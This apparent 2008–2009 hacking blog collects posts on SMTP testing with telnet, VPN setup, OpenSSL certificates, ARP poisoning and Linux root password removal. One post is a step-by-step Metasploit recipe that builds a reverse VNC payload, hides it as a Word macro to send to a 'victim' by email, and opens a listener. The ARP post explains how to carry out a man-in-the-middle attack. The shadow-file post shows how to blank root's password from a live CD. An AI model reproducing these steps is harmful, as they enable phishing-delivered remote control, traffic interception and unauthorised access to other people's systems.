Saturday, August 1, 2009

How can I test my SMTP service ?

You can use TELNET to test your SMTP service. SMTP uses port number 25, so in order to use telnet to open an SMTP session with an Exchange server we use the command

telnet test.server 25
If the connection is successful, we should see a banner and a command line interface. You may consult RFC 821 for SMTP commands,

220 test.server Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Mon, 15 Sep 2009 20:50:07 +0210
helo test.server
250 test.server Hello []
mail from:
250 2.1.0 OK
rcpt to:
250 2.1.5
354 Start mail input; end with .
subject: test mail
Hi Sam,
I'm sending email using TELNET.
250 2.6.0 Queued mail for delivery
221 2.0.0 test.server Service closing transmission channel
Connection to host lost.
Press any key to continue...

The above techniques can also be used for NULL sender identity check and SMTP Open Relay.

Sunday, May 24, 2009

Metasploit & Reverse VNC Injection hidden in word file -PoC (Proof of Concept)

Hello friends, today I'm going to show how to use Metasploit v3.2 payload feature for Reverse VNC Injection, The steps are given below,

Lets begin

1) Create a payload for ReverseVNCInjection with Metasploit's msfpayload utility,
./msfpayload windows/vncinject/reverse_tcp LHOST= V > exploit.bas

2) Copy exploit.bas file to another windows system to make .doc file,
Create New doc file --> write some text into it, then do the following ,
go to tools–>macro–>visualbasic editor.
then go to File–>import file–> and choose the exploit.bas and save it with a name ex: NiceGame.doc
Now file is ready, send this file to victim via mail or by some other ways,

3)Now in Backtrack-4, type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

On target windows system, when victim open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the Backtack.

Note : There is no required of VNC installed in the Victim PC; you can also do this in WAN also, only thing is that you should port forward your 4444 port in modem or router.

Original Video links for the above guide,

Tuesday, November 18, 2008

Anonymous Internet Surfing or Hide your IP address | Open VPN | Open Proxy Server | IP range blocked by Rapidshare.Com

Hi friends, resently I found an Open VPN (Virtual Private Network) Server named "". You can create 30 days trial account. This type of server can be used for diferent purposes ( already mentioned). To access VPN sevice you have to the following steps...
~:For XP users :~
(This instructions are applicable to Microsoft Windows XP).

1. Click on "Start button" >> "Connect To" >> "Show all connections" .
2. Choose "Create a new connection".
3. Click on "Create a connection to the network at your workplace".
4. Select Virtual Private Network connection (VPN). Click Next.
5. Enter company name "Relakks". Click Next.
6. Enter "" as "Host name or IP address". Click Next.
7. Select "My use only" if you want this connecion to apply only to your user on the computer. Select "Anyone's use" if you want this connection to apply to all users. Click Next.
8. Check "Add a shortcut to this connection to my desktop" if you want easy access to your Relakks-service.
9. Click Finish.
10. You should now disable "File and Printer Sharing" as it can pose as a security issue.
11. Right click on the newly created Relakks connection and choose "Properties"
12. Click on the "Network" tab and uncheck the "File and Printer Sharing for Microsoft Networks".
13. Click OK.
14. To use Relakks (Safe Surf), double click the connection.

~:For Vista users:~
Connecting Windows Vista

Due to a problem with SP1 for VISTA your VPN connection will no longer work. You need to uninstalled SP1 and the VPN connection works fine again. Now let's see when Microsoft fix this bug and release a hotfix.

"1. Click Start>All Programs>Accessories and click "Command Prompt".
2. In the Command prompt, type the following commands one by one and
press Enter after each one.
Netcfg -u MS_L2TP
Netcfg -u MS_PPTP
Netcfg -l %windir%infnetrast.inf -c p -i MS_PPTP
Netcfg -l %windir%infnetrast.inf -c p -i MS_L2TP
NOTE: When prompted by User Account Control, click Continue. "
Follow these simple steps to install Säker Surf (Safe Surf) on your computer using the PPTP protocol.
(This instruction applies to the operative system Microsoft Windows vista).
1. Click Start menu and then Connect To.
2. Click on "Set up a connection or network".
3. Choose "Connect to a workplace" and then click Next.
4. Choose "Use my Internet connection (VPN)".
5. Type "" in the "Internet address" field.
6. Type "Relakks" in the "Destination name" field.
7. Check the alternative "Allow other people to use this connection" if you want your service to be available for any user using this computer. Click Next.
8. Fill in your username and password. NOTE! Leave the "Domain" field empty.
9. Click Connect to finish the installaion and to test your connection.
10. You will no get a notification saying "You are connected". Click Close. You are now connected to the service.
11. You will see a dialogue box saying "Select a location for the 'Relakks' network". Choose "Public location" for highest security settings. Then click Close.
You are now connected to the Relakks Safe Surf service. A small status icon will appear in the lower right corner of your screen looking like two computers with a yellow warning triangle in front of them. If you want to stop using the service you just click the icon and then Relakks. Under Relakks (Public network) you click Disconnect to disconnect from the service.
To reconnect click on the Start menu and then Connect To. Choose Relakks and click connect.

~:For MAC users :~

Connecting OSX
Follow these simple steps to install Säker Surf (Safe Surf) on your computer using the PPTP protocol.
1. Open Internet Connect (in the application folder).
2. Click VPN.
3. From the Configuration pop-up menu, choose PPTP.
4. Type: in the field Server Adress.
5. Type your RELAKKS Account Name in the field Account Name.
6. Type your RELAKKS Password in the field Password.
7. Click Configuration -> Edit Configurations
8. Save your configuration in the pop up as RELAKKS.
9. Click OK
10. Choose "Show VPN status in the menu bar" to monitor that your RELAKKS VPN is active.
11. Click Connect to active your RELAKKS VPN Service.
12. End Internet Connect. Save your configuration in the pop up as RELAKKS.
OSX (för alla macare med Leopard)
Mac OS X 10.5 leopard has changed and the Internet Connect application is not in the system anymore. To configure a VPN, the user has to go to the Network Preferences pane and create a connection with the button labeled '+' in the left lower corner, then select VPN and fill in the information on Relakks. VPN setup in 10.5 (English)
1. Go to System Preferences, then Network.
2. Click on the plus symbol in the lower left corner to add a new connection. (Note: you may need to click the lock icon in the lower left to unlock the preference pane and make changes.)
3. Under "Interface" select "VPN".
4. Set the VPN Type to PPTP.
5. The Service Name should be Relakks.
6. Click "Create".
7. The window will now show a place for the server address, and account name.
8. The server is
9. Type your RELAKKS Account Name in the field Account Name.
10. Click on "Authentication Settings" and select "Password"
11. Enter your Relakks password and click "OK"
12. Click the checkbox for "Show VPN status in menu bar"
13. Click "Apply" in the lower right corner.
14. Click "Connect"

Saturday, June 14, 2008

What is ARP Poisoning ? How to get rid from ARP poisoning ?

What is ARP Poisoning ?

In an Ethernet network computers communicate with each other via Ethernet (MAC (Media Access Control)) addresses. So, there is a mechanism needed for matching of IP addresses with the addresses in an ethernet network. The mechanism is called ARP (Address Resolution Protocol). What ARP does is exactly what most people do, when they have to find Mister X in a crowd of people - they shout loud enough, so that everyone can hear them and expect Mister X to answer, if he is there. When he answers, we will know who is he.
When ARP wants to know whats the Ethernet address matching a given IP address it uses an Ethernet technic, called BROADCASTING, with which the datagram is addressed to all the workstations in the network. The broadcast-datagram sent by ARP contains a request for the IP address. Every computer, received that request compares the requested address with its own IP address and if they match, it sends an ARP reply back to the asking computer. After rreceiving the reply, the asking computer can get the Ethernet address of the computer it is looking for, from his reply. After the computer finds an Ethernet address, he stores it in its ARP cache (ARP table), so he won't need to look for it the next time he wants to send a datagram to the same address. However, it is not good this information to be stored forever (the Ethernet adapter of the other host may be replaced for some reasonm and the entry for the computer's IP in the ARP cache will become invalid). So the entries in the ARP cache expire after a period of time.

What's the difference between switch and hub?

The switches (hubs) don't only provide more connect points to the network - they're also retransmitters of the signal. However, the hub just retransmits the data received from one port to all the other ports so no need to poison, as you get the datagram anyway. Normally, the network adapter compares the destination Ethernet address of the packets, and compares it with it's own Ethernet address. If they match - the data is accepted. If they don't - it just drops the packets. You can put your network adapter in promiscuous mode (which is exactly what Ettercap does) and get all the packets. The switch does the things in a more 'elegant' way. It has a simple CAM (Channel Access Method) table, which is a simple mapping of Ethernet addresses and ports. When a datagram comes through a port, the switch remembers the source Ethernet address of the datagram and stores it in the cam table for the given port, so when a datagram arrives for this computer, it doesn't retransmit it to all ports, but only to this one, which is bound to the Ethernet address of the receiver in the CAM table. If no Port Security, the CAM table is dynamically updated (e.g. if you want to connect to another port, if you change your network adapter etc.). Thus, we can change the CAM table and map another Ethernet address to our port. This technique is called Port Stealing and is discussed in another topic.

Now about the poisoning:

Most operating systems will replace an entry in their ARP cache even if they haven't sent and ARP request before. That allows a MITM (Man-In-The-Middle) attack to be performed. For example, lets say we have 2 computers, with Ethernet addresses AA:AA:AA:AA:AA:AA for computer A, and BB:BB:BB:BB:BB:BB for computer B and IP addresses for computer A and for computer B. Now we want to perform MITM attack. We are computer C with Ethernet address CC:CC:CC:CC:CC:CC and IP address So we send and ARP reply to computer A, saying that we have IP address Computer A updates its ARP cache and since we have an Ethernet address CC:CC:CC:CC:CC:CC, the entry in his ARP cache for is bound to our Ethernet address. Now when computer A wants to send a datagram to computer B, it checks first the ARP cache, to see if computer B's Ethernet address is already there. Since th packet is for (computer B's IP address), computer A founds that the Ethernet address for computer B is CC:CC:CC:CC:CC:CC (out Ethernet address) and sends the datagram to us. Computer A is poisoned. We do the same to computer B - it has an ARP entry for (computer A's IP address) bound to CC:CC:CC:CC:CC:CC (our Ethernet address), so when it sends datagrams to computer A, these datagrams come to us. For the communication between computer A and computer B to continue uninterrupted, we need to forward the packets to their original destination. So when we receive a packet for a computer A - we forward it to computer A, when we receive a packet for computer B - we forward it to computer B. In Linux, for this to works, you can use the simple kernel forwarding (echo 1 > /proc/sys/net/ipv4/ip_forward) or use a more complex one, that Ettercap and some other tools use, which even allows you to perform a MITM attack on a SSL connection.

Click here for more information about ARP

Counter measures for
ARP poisoning :

Some operating systems like Solaris do not accept ARP replies without first initiating an ARP request, so they are not vulnerable to this attack.
In this case, an ICMP spoofed packet (ping) is used. The goal is, to get a valid entry in victim's ARP cache, because when they receive an ARP reply from you they will first check their cache to see if you're already there and if you're not - they simply wont add you at all. So you send each victim a ping with source your own Ethernet address and the other victim's IP address. In the case mentioned above, you ping computer A with source IP address and Ethernet address CC:CC:CC:C:CC:CC and computer B with source IP address and Ethernet address CC:CC:CC:CC:CC:CC. Once you gor yourself in their ARP cache, you can poison normally.

Tuesday, June 3, 2008


  1. After the installation of IIS. Go to the Internet Information Services Manager . Select the website where we require to install the certificate. then right click on the default website. Then select directory security tab.

On the Directory Security tab, click Server Certificate

Click Next and select Create A New Certificate

Select Prepare The Request Now, But Send It Later and click Next

Type a name for the certificate and bit length, and then click Next.

Type your organizational name and organizational unit in the box provided and click Next.

Enter your Web server name and click Next.

In the next dialog box, provide some geographical information and click Next.

Enter the location and the name for the certification request, then click Next.

Verify the information and click Next, and then click Finish.By default The request file will be saved in the (c:\>) drive. The file type will be (.txt) format.Copy it and take it to the OPENSSL CA server .

  1. In the OPENSSL server paste it in the CA-server directory. Rename it to (newreq.pem). (because the OPENSSL command to sign a certificate request takes only this name so it must be newreq.pem and will be in the current directory).

  2. Now, lets sign the 'certificate request':

$sh /usr/lib/ssl/misc/ -sign ( The file is automatically stored in that specified loacation at the time of CA installation).

  1. After the file sign process completed the certificate is created named (newcert.pem ) in the current directory.

  2. This certificate will not be supported by a windows 2003 server. You have to again rename it to .cer file.

  3. Take the .cer file to the windows machine. Again select the Internet information service manager(IIS).

  4. Go to the Internet Information Services Manager .

Select the website where we require to install the certificate then right click on the default website.

Then select directory security tab.

On the Directory Security tab, click Server Certificate.

select process the pending request and install it.

Then browse and select the new certificate and click next then finish. The newly installed certificate will be installed. You can see the certificate by clicking on the view certificate button.

Apache-ssl and CA


Under Debian, the following packages have to be installed via apt-get:

* apache-ssl

* openssl

* libapache-mod-ssl (will automatically be installed by apache-ssl)

The SSL certification process consists of three basic steps:

* If not done already, create a certificate authority (CA), which we will use to sign our own


* Create a new certificate request

* Sign the request with our CA to obtain a valid certificate.

Create a certificate authority

The OpenSSL package comes with a default openssl.cnf file under /usr/lib/ssl/openssl.cnf.

We will edit the default values slightly, ie. we change the default path from demoCA to

ourCA. To do so, copy /usr/lib/ssl/openssl.cnf to /etc/ssl/openssl.cnf and change the line

dir = ./demoCA


dir = /etc/ssl/ourCA

For security reasons, you will have to create the necessary file and directory structure

manually. In particular, you have to create the following folders and files:

* /etc/ssl/ourCA/

* /etc/ssl/ourCA/index.txt (empty file)

* /etc/ssl/ourCA/newcerts/

* /etc/ssl/ourCA/private/

* /etc/ssl/ourCA/serial (file containing "01" as the first and only line)

We can now tell openssl to create a new certification authority for us:

#openssl req -new -x509 -keyout /etc/ssl/ourCA/private/cakey.pem -out

/etc/ssl/ourCA/cacert.pem -config /etc/ssl/openssl.cnf

You will be asked a few questions about the new CA. Just enter information that makes sense

and is valid. Also, choose a good passphrase, since you'll have to remember it every time

you want to validate and sign a new certificate request.

Issue a certificate request

We are now ready for the interesting part of this tutorial. To create a certificate request, execute

#openssl req -new -keyout newkey.pem -out newreq.pem -days 365

OpenSSL will again ask you a few questions. Make sure that you enter the hostname of your SSL

server as "Common Name". This is very important and things will break if you don't do it.

If everything went fine, this will give you two new files in the directory where you ran this

command. The first is our certificate private key and the second file (newreq.pem) is the c

ertificate request for the CA.

There is one obstacle with the private key in the current form: It requires a passphrase to be

used. That means, if you want Apache to use this SSL key, you'll have to supply the passphrase

at Apache's startup. This is not very handy, for sure. We can however, remove the passphrase by


#openssl rsa -in newkey.pem -out nopwkey.pem

You will be asked for the private's key passphrase. If things went right, you will have a new

private key called nopwkey.pem, which is not passphrase protected anymore.

To let a CA sign a certificate request, they need both, our private key and the certificate

request. We can combine both into one file by cat'ing them together:

#cat newreq.pem nopwkey.pem > new.pem

Signing the certificate

The last step consists of the actual signing process. Just issue

#openssl ca -policy policy_anything -out newcert.pem -config /etc/ssl/openssl.cnf

-infiles new.pem

in the same directory where your certification request files are stored. You will first be asked for the CA passphrase (now you know why it is important to remember it!) and you can then either sign or reject the certificate.

You should now copy newcert.pem and nopwkey.pem to some convenient place, since Apache will only need those two files to operate in SSL mode.

Apache-SSL configuration

Under Debian, the SSL enabled Apache version has its own configuration file, available under /etc/apache-ssl/httpd.conf. Edit and change or add the following lines:

SLCertificateFile /path/to/newcert.pem //This is our signed certificate

SSLCertificateKeyFile /path/to/nopwkey.pem //This is our unencrypted private key.

Start Apache-SSL by executing,

#/etc/init.d/apache-ssl start

Thursday, May 29, 2008

How to Break Linux password ... !

Dear friends!

Did you know that default Linux installation is vulnerable?

Linux root password can be broke easily by modifying ‘/etc/shadow’ file.

In Linux/Unix ‘shadow’ file used to store user name, password, account validity period etc.

User password is stored into 3rd column in encrypted form and each column is delimitated by :, e.g.

Root:x:/qwYnM6ulk … :9999:7:1:::

You can not change the shadow file from running Linux.

Only you need to boot up the target system with a live Linux cd ( may be Knopix, backtrack ) and log into the system as root user.

If you empty the 3rd field it implies that no password is set against root account. After modifying the field will look like this,


Save the file and reboot your system.

Try to log into system as root, you will no need of password at all.

I tried it in different version of Linux (Red Hat 9, Fedora 7, Mandrake 10.0) it worked successful. But in harden Linux system it may not work.

Note: You must take a back up copy of ‘/etc/shadow’ file for emergency shadow file recovery.